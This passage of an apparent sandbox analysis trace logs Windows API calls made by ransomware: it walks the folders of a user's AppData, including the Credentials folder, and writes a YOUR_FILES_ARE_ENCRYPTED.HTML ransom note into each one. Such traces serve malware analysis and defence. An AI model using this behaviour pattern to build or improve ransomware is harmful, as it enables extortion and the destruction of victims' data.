hFindFile=0x626778) returned 1 [0110.997] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0110.997] GetProcessHeap () returned 0x600000 [0110.997] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0_32\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\clr_v4.0_32\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0110.997] WriteFile (in: hFile=0x310, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0110.998] CloseHandle (hObject=0x310) returned 1 [0110.998] GetProcessHeap () returned 0x600000 [0110.998] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.998] GetProcessHeap () returned 0x600000 [0110.998] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0110.999] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x508b12b7, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x508b12b7, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0110.999] StrStrIW (lpFirst="Credentials", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.999] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned 61 [0110.999] GetProcessHeap () returned 0x600000 [0110.999] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0111.000] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials" [0111.000] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*" [0111.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x508b12b7, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x508b12b7, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626778 [0111.001] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x508b12b7, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x508b12b7, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0111.001] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x508b12b7, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x508b12b7, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2b60, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 1 [0111.001] StrStrIW (lpFirst="DFBE70A7E5CC19A398EBF1B96859CE5D", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.001] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\DFBE70A7E5CC19A398EBF1B96859CE5D") returned 94 [0111.001] PathFindExtensionW (pszPath="DFBE70A7E5CC19A398EBF1B96859CE5D") returned="" [0111.001] lstrlenW (lpString="") returned 0 [0111.001] PathFindExtensionW (pszPath="DFBE70A7E5CC19A398EBF1B96859CE5D") returned="" [0111.001] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x508b12b7, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x508b12b7, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x508b12b7, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x2b60, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="DFBE70A7E5CC19A398EBF1B96859CE5D", cAlternateFileName="DFBE70~1")) returned 0 [0111.001] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0111.001] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0111.001] GetProcessHeap () returned 0x600000 [0111.001] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Credentials\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\credentials\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0111.003] WriteFile (in: hFile=0x310, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0111.004] CloseHandle (hObject=0x310) returned 1 [0111.004] GetProcessHeap () returned 0x600000 [0111.004] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.004] GetProcessHeap () returned 0x600000 [0111.004] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0111.004] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5248b95c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5248b95c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Feeds", cAlternateFileName="")) returned 1 [0111.004] StrStrIW (lpFirst="Feeds", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.004] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds") returned 55 [0111.004] GetProcessHeap () returned 0x600000 [0111.004] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0111.004] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds" [0111.004] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\*" [0111.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5248b95c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5248b95c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0111.004] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42ce6642, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5248b95c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5248b95c, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0111.005] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5248b95c, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5248b95c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0xa6d8546b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="FeedsStore.feedsdb-ms", cAlternateFileName="FEEDSS~1.FEE")) returned 1 [0111.005] StrStrIW (lpFirst="FeedsStore.feedsdb-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.005] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 77 [0111.005] PathFindExtensionW (pszPath="FeedsStore.feedsdb-ms") returned=".feedsdb-ms" [0111.005] lstrlenW (lpString=".feedsdb-ms") returned 11 [0111.005] PathFindExtensionW (pszPath="FeedsStore.feedsdb-ms") returned=".feedsdb-ms" [0111.005] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x52454a32, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52473278, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52473278, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0111.005] StrStrIW (lpFirst="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.005] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 95 [0111.005] GetProcessHeap () returned 0x600000 [0111.005] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0111.006] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0111.006] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*" [0111.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x52454a32, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52473278, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52473278, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60fad0, dwReserved1=0x60fa60, cFileName=".", cAlternateFileName="")) returned 0x626778 [0111.006] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x52454a32, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52473278, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52473278, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60fad0, dwReserved1=0x60fa60, cFileName="..", cAlternateFileName="")) returned 1 [0111.006] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52473278, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52473278, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0xa6d8a24a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x60fad0, dwReserved1=0x60fa60, cFileName="Internet Explorer Suggested Sites~.feed-ms", cAlternateFileName="INTERN~1.FEE")) returned 1 [0111.006] StrStrIW (lpFirst="Internet Explorer Suggested Sites~.feed-ms", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.006] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\Internet Explorer Suggested Sites~.feed-ms") returned 138 [0111.006] PathFindExtensionW (pszPath="Internet Explorer Suggested Sites~.feed-ms") returned=".feed-ms" [0111.006] lstrlenW (lpString=".feed-ms") returned 8 [0111.006] PathFindExtensionW (pszPath="Internet Explorer Suggested Sites~.feed-ms") returned=".feed-ms" [0111.006] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52473278, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52473278, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0xa6d8a24a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0x60fad0, dwReserved1=0x60fa60, cFileName="Internet Explorer Suggested Sites~.feed-ms", cAlternateFileName="INTERN~1.FEE")) returned 0 [0111.006] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0111.006] wnsprintfW (in: pszDest=0x30d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0111.006] GetProcessHeap () returned 0x600000 [0111.006] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0111.009] WriteFile (in: hFile=0x308, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0111.010] CloseHandle (hObject=0x308) returned 1 [0111.010] GetProcessHeap () returned 0x600000 [0111.010] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.010] GetProcessHeap () returned 0x600000 [0111.010] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30d81a8 | out: hHeap=0x600000) returned 1 [0111.010] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x52454a32, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x52473278, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x52473278, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0111.010] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0111.010] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0111.010] GetProcessHeap () returned 0x600000 [0111.010] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0111.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\feeds\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0111.016] WriteFile (in: hFile=0x320, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0111.017] CloseHandle (hObject=0x320) returned 1 [0111.018] GetProcessHeap () returned 0x600000 [0111.018] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0111.018] GetProcessHeap () returned 0x600000 [0111.018] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0111.019] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x430ec4ba, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5249ddea, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ddea, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Feeds Cache", cAlternateFileName="FEEDSC~1")) returned 1 [0111.019] StrStrIW (lpFirst="Feeds Cache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.019] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache") returned 61 [0111.019] GetProcessHeap () returned 0x600000 [0111.019] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0111.020] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache" [0111.020] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\*" [0111.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x430ec4ba, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5249ddea, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ddea, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626978 [0111.020] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x430ec4ba, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5249ddea, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ddea, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0111.020] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249ca3f, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249ca3f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ca3f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="1K9321PQ", cAlternateFileName="")) returned 1 [0111.020] StrStrIW (lpFirst="1K9321PQ", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0111.020] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\1K9321PQ") returned 70 [0111.020] GetProcessHeap () returned 0x600000 [0111.020] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30d81a8 [0111.021] lstrcpyW (in: lpString1=0x30d81a8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\1K9321PQ" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\1K9321PQ") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\1K9321PQ" [0111.021] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\1K9321PQ", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\1K9321PQ\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\1K9321PQ\\*" [0111.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Feeds Cache\\1K9321PQ\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5249ca3f, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x5249ca3f, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5249ca3f, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d4cc, dwReserved1=0x63d450, 